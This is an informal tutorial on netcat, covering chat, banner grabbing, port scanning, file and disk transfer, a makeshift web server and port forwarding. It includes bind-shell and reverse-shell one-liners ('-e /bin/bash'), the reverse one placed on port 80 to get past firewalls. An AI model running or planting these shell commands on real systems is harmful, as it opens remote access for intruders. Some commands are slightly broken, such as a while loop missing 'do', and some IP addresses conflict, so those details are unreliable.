Netcat Ninjutsu

Netcat is a an extremly flexible tool. It follows the Unix physiology that programs should do one thing and do it well. At it's simplest netcat allows you to connect to and listen to UDP or TCP sockets but as I'll show it can be very powerful. It comes standard on most Unix's including Linux and BSD and can be freely downloaded for windows.


Network Chat
To begin we'll look at setting up a server and a client to create a simple instant messenger. To start a server listening on port 4242 we just run:
netcat -v -lp 4242
On the client side we connect to our server (192.168.1.1) on port 4242 with:
nc -v 192.168.1.2 4242
From here if you type any message on either computer the message will appear on the other.

Banner grabbing
To grab the banner of a website just do:
netcat -v 192.168.1.1 80
and enter any invalid text like 'hello'
localhost.localdomain [192.168.1.1] 80 (www) open 
hello
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"\>
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>hello to /index.html not supported.<br />
</p>
<hr>
<address>Apache/2.2.16 (Ubuntu) Server at 192.168.1.1 Port 80</address>
</body></html>
Here we can see the host is running Apache 2.2.16 on Ubuntu

Port Scanning
It is possible to use netcat as a very simple port scanner. With the following command it will scan 192.168.1.1 on tcp ports from 1 to 1000: 
nc -v -w 1 -z 192.168.1.1 1-1000
 You can see below that ports 80,139,445,902 are open.
user@pc~$ nc -v -w 1 -z 192.168.1.1 1-1000
pc [
192.168.1.1] 902 (?) open
pc [
192.168.1.1] 445 (microsoft-ds) open
pc [
192.168.1.1] 139 (netbios-ssn) open
pc [
192.168.1.1] 80 (www) open
Remote shell

So far we have used netcat on its own but the real beauty of the Unix philosophy is programs can be chained together to make them more powerful. Each takes care of its small part, in this case netcat can provide the network connection to another program. If for instance we wanted a remote console or shell we can connect the shell program bash to a listening netcat server on port 4242 with:
nc -lvp 4242 -e /bin/bash
or the console in windows with:
nc -lvp 4242 -e cmd.exe
To connect simple use:
nc -v 192.168.1.2 4242
user@pc~$ nc -v 127.0.0.1 4242
pc [192.168.1.1] 4242 (?) open
ifconfig
eth0      Link encap:Ethernet  HWaddr d4:9a:20:e4:d8:1c  
          inet addr:192.168.0.1  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::d69a:20ff:fee4:d81c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2215688 errors:1 dropped:0 overruns:0 frame:1
          TX packets:1935623 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2006473900 (2.0 GB)  TX bytes:572179986 (572.1 MB)
          Interrupt:42 Base address:0x4000 


Reverse remote shell
In the previous example we created a server that allowed a client to connect. Upon connection the client was given a shell. To get around firewalls and IP address issues sometimes we need a reverse shell. In this case the client connects to the server and provides it with a shell. We also use port 80 which is probably allowed by the firewall. We set up the waiting server with:
nc -lvp 80
And connect with the shell with:
nc -vn 192.168.1.2 80 -e /bin/bash
This time the server is dropped into the shell. But when we disconnect the server will close, but we'd like to keep it available so we can reconnect. To do this e can put a loop around it with:
while true; nc -lvp 80; done
Now the while loop will restart the server when it exits.

File transfer
Netcat simply sends data accross the network, it doesn't care what data it is so we are able to send files by piping data in and out of netcat. To send a file we first set up a server that will receive the file:
server: nc -vn -lp 4242 > fileRecieved
Then we connect with the client and send the data to the client:
client: nc -vn 192.168.1.2 4242 < fileSent
Stream music
Since it's just data we can also stream music.
nc -lp 4242 | mpg123
cat mySong.mp3 | netcat 192.168.1.2 4242
Copy an entire hard drive across the internet
We can even copy and entire drive over a network or the internet by connecting dd and nc:

nc -l -p 4242 | dd of=/dev/sda

dd if=/dev/sda | nc 192.168.1.1 4242

Keep in mind that the drives must be unmounted and that the it will take a while.

Web server
You can even throw together a quick and dirty webserver with:
while true; do nc -l -p 80 -q 1 < index.html; done
Port forwarding
We can even connect netcat to netcat to redirect traffic. In the following example we have a netcat server listening on port 8080. Any traffic coming to port 8080 is piped into a netcat client connected to www.example.com port 80
nc -l 8080 | nc www.example.com 80